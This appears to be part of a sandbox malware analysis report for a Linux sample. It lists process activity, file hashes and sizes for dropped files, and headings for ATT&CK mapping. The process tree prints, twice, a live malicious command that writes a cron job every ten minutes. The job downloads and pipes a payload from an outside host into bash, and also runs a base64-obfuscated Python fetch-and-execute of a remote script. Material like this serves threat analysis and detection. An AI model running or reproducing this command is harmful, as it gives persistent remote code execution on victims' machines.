/usr/bin/bashbash -c "echo '*/10 * * * * (curl -s http://dw.c4kdeliver.top:443/2.gif || wget -q -O - http://dw.c4kdeliver.top:443/2.gif || lwp-download http://dw.c4kdeliver.top:443/2.gif /tmp/2.gif) | bash -sh; bash /tmp/2.gif; rm -rf /tmp/2.gif; echo cHl0aG9uIC1jICdpbXBvcnQgdXJsbGliO2V4ZWModXJsbGliLnVybG9wZW4oImh0dHA6Ly8xODUuMTcyLjEyOC4xNDY6NDQzL2QucHkiKS5yZWFkKCkpJyB8fCBweXRob24yIC1jICdpbXBvcnQgdXJsbGliO2V4ZWModXJsbGliLnVybG9wZW4oImh0dHA6Ly8xODUuMTcyLjEyOC4xNDYvZC5weSIpLnJlYWQoKSkn | base64 -d | bash' | crontab -"1⤵
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
-
-
/usr/bin/ssss -ant1⤵
-
/usr/bin/ssss -ant1⤵
-
/usr/bin/ssss -ant1⤵
-
/usr/bin/bashbash -c "echo '*/10 * * * * (curl -s http://dw.c4kdeliver.top:443/2.gif || wget -q -O - http://dw.c4kdeliver.top:443/2.gif || lwp-download http://dw.c4kdeliver.top:443/2.gif /tmp/2.gif) | bash -sh; bash /tmp/2.gif; rm -rf /tmp/2.gif; echo cHl0aG9uIC1jICdpbXBvcnQgdXJsbGliO2V4ZWModXJsbGliLnVybG9wZW4oImh0dHA6Ly8xODUuMTcyLjEyOC4xNDY6NDQzL2QucHkiKS5yZWFkKCkpJyB8fCBweXRob24yIC1jICdpbXBvcnQgdXJsbGliO2V4ZWModXJsbGliLnVybG9wZW4oImh0dHA6Ly8xODUuMTcyLjEyOC4xNDYvZC5weSIpLnJlYWQoKSkn | base64 -d | bash' | crontab -"1⤵
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
182B
MD54847d0ba37990c8b3e81b82600e3759f
SHA125efb8e596a1cbcc0131b7ed85482b6c86e3fbd0
SHA2568f56f290451bc9a85fbcc7bd6cb605973ebb12412920d050d8be0d4666c8f73f
SHA512899ab30f716baf622cbc2d1c5dafd6a955df2583ec844bc7480257ee0eae0eef94564bd79c17f565d2d3c46a8697bcf7dea90fc03be1b1da2574a70635e93ed3
-
Filesize
179B
MD57085dc81c0f71aa007f9aa2753f33562
SHA15ebe6f7d0093ff39eb9bb1c5531b996ad89954c2
SHA25626e311de204b3727c0d0a282ca88d34e02e9e3b33f7f164a890152cc2ecdd9d7
SHA512cdbe6288a734b1cf0b8a36d7a093eddf74d9298beb1c24cf18d7182fbbbfc7b1e0cf11a69dd30694e7f156bb94f9916d78c646b7127141803db6288f5568350b
-
Filesize
334B
MD55bdb87c18d322065c21c2b64511e8c9a
SHA195805bfe6a2acd6c93e7d2872276bb47b66ebb47
SHA25645c90566fe2215656c7d2dd32cb216e276bbaf0f3992a92014dbf3a61113dc62
SHA512290a7c8f5a62a713fe980cae9f459198db93e04ed0f0162c06b9d4645cfbb85765172b9cc34a56ff607dd1ed4c0a217cd22781058d2f0ac73e2f057f60a3ec6a
-
Filesize
367B
MD57240970d2eaf113cbd0f8b3d638f3030
SHA16f2fe902906eeae017a2d219d1fe212250e7eda0
SHA25690d6f965fe33845035f5da674560a043f9cfbb992c715394a63c38bc96c11d75
SHA5129a0d03e573b37746b719fd4bcf69be12e46798ebfff72b3cdd7e9ff367a6d89bdebaa128b61d3a5536495cd962fd670fe6d782610b04ed1e208598a9a606d9d7
-
Filesize
364B
MD5c05ea7b436c52279a74eea5fc066a6c4
SHA1ee6d10909a422d536d4f501865c3ac924f7ffded
SHA256e81798f161ea7ff564203e9ab48a00f0e26b4f8c3fd43f18f187870b16f44e40
SHA512163e1cb3751b4e5561e8c6c6f85a7dafe3ae7fbcf79b814ab8255788810549b997999f0d1758f70481c28863133ccadf9b172f37e20a1c0d0bdefe17f3fc30f1
-
Filesize
359B
MD5ca72b64121de5e1f38dc84abbdeb6866
SHA1416e2b1567af3cfb1d7747fbd57932c67c771b37
SHA256fac4fd7d3c86c91f2111ca93704d45e066e8a8f4dc878a6637849db0e0b4b1f9
SHA5126fb2a33111f711c5bc8b171e4c6e39b57e7ae8d1e2da10775fbf0ea3d1279d8b9b327cd5ec4c5c51fe84adc3070490051fe5b9be0f6f38934a372b19f9b20f64
-
Filesize
4B
MD5ac796a52db3f16bbdb6557d3d89d1c5a
SHA1442bdc9a0e80132c626a3605e010b8fb0ee0c1f6
SHA25633bf4329c846019957cdba15fd5767df4392769eac8c3637ac395651a72108af
SHA512ee9f4e2ef9a00de553f5c8a72a10cab62bb41e317302eab047115279ce1847306c6bd1130546e20b29035df3ab7509e10d712995174278ca4f79be7c7628b2b8
-
Filesize
184KB
MD563a86932a5bad5da32ebd1689aa814b3
SHA1472548a4b8295182f6ba8641d74725c2250b7243
SHA2560013b356966c3d693b253cdf00c7fdf698890c9b75605be07128cac446904ad9
SHA5124631e014f77c683819ae34278625b21525d9fa0697e5376ff2babfd77af3ca609fb4a82cde2374f2c96b00dc52cdc34d7efdc40a7ee2609566a6b6e9e630f332
-
Filesize
2.3MB
MD5915aec68a5b53aa7681a461a122594d9
SHA138be55f1fc4ce1cb5438236abc5077019e5e1cdf
SHA256e2c3e81aa24b20ac71147340adc1eaedf077ad00e4a2359e3db47b166cf5411a
SHA512668369810060738e38bc7ed2ad4ff4fbeb8bc99fb46e080423972982b486b5e5e6bab6fc73ede0ee2e5638c8f5fcb1e8ea764a7b6bfb9c6086f238ec5cade8d0
-
Filesize
371B
MD510dc79941de4d72c5353f28974f31c92
SHA132792bf77863ef0a3572cef7aee83da17fbaf3a4
SHA256dee46bab77e9dc26abb4062c6df75d05feb19034754908832271215045b2de5a
SHA512f76c957c2cbdace6310237668863614f3012abeeb02e1298e01961fbeb030c3a109dea561dab3ff719b49670e73c4ab95a0cf0ee9b89e521c54410d45f5efff1
-
Filesize
368B
MD5ba411ff974701246bd51184dc62dff03
SHA1fde92553185f2f3e17be8500a02deeebdff5344f
SHA256a0d7d55b25cefb4ea12b474532bee974916052fae36ccb30657d78b21004e1fa
SHA51202463506f02c3bc5d06439b033b1c01c977414ab8b3eb4eb5b306b6a098f61cbdced3101b17afbb9d484fd93d37d4502f4c4270f17e5d7c61de2db532c7d17bc
-
Filesize
655B
MD55b32fa80be53332415b4c2a9495e0dfc
SHA1258f57b488bd38ad63a83e6c9379f5beb7468d4b
SHA25686f8880e02104eb04653b9cc3394f856cd9b05881f8af533c83011a725f34678
SHA512e9d4a6d3c182c90e97b5c7dfa8cb7f8602a1d9809b44699160131260702afe4a1e01ce1cefc2fc39499287113fe1cd6fd935645eae5444187188585f9d0cf659
-
Filesize
655B
MD5f752101481d681c51ac79246d3aca9a2
SHA1ede8029f9dd50510c115d1daca77d35c5ceeffea
SHA256ce544a00f20cd65511615aa83500613e391745362644541b0ee1a8f400228a2d
SHA5128d0ac509873009dedcc3ba6788ce7fceb6bfafa167464f7dc9f9d3e73e9fc8804335b1ee27674e8f7cac0946e18fe59afb3597e25bee9aba3079b2e7f2bf7495
-
Filesize
655B
MD56aea75178934bbbcde02d0387e097b2a
SHA1c47ff1a2134f2452be812ab6a1e3cd9eed2b1bd3
SHA25647b5a0863deaed96a2a99f75e21f56f7ec4619af0318f28a31691a5f8fce3074
SHA51292f582bd77ebc52ea24c9297fbbc8ffe451d5b14bd4fe1569c5c8092637b076bbf5c03655df64f87617c49d10ce91bf97754c5fee476b008852b340a1cad3610
-
Filesize
653B
MD5c198ca142ba0e2552fd42ab1e5e790db
SHA1180da2e168757b152ef15600e9e22ffb4fb15cec
SHA25667b98e0b11af1ade9057453d4924b7c35f69ff729edcea8e4417acd21a97530e
SHA512e686f338ce443c1110e1ba6b4d2c20f885d6c72f54449d39beaf04e860e3ff7a475f31b57b3cb209a796ce257f7daae4367a851cf6ba531b861a9fe03d882b95
-
Filesize
655B
MD5bb5b143ba8c213e5410630b90a7925b6
SHA1e32c9d576d3662c119e52d4253c3f97aeb65bbce
SHA256162c409e4c8981ae29965d76ffbc8f34c5aeda0453f754a73dd0cf5d895e5c42
SHA512a7873a6f8382226e858f22d0acbad6dbffdd99f300c878151dec645346365dba69f67fc0d12293ddeddc39b839643533fc7387ea2492e655733563d15fb546ec
-
-
-
-